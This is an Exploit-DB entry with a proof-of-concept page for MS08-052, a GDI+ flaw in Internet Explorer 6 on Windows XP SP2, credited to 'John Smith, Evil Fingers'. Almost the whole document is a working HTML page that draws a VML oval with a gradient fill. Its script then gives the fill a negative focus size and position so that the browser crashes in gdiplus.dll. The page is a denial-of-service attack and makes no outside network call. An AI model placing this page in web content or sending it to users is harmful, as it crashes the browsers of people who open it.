Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)

EDB-ID:

6619

Author:

John Smith

Type:

dos

Platform:

Windows

Published:

2008-09-28

<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); } 
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180

Credit:
John Smith,
Evil Fingers

Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>

<XML:NAMESPACE  ns="urn:schemas-microsoft-com:vml" prefix="ef">


<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>
		
<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');

ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>

# milw0rm.com [2008-09-28]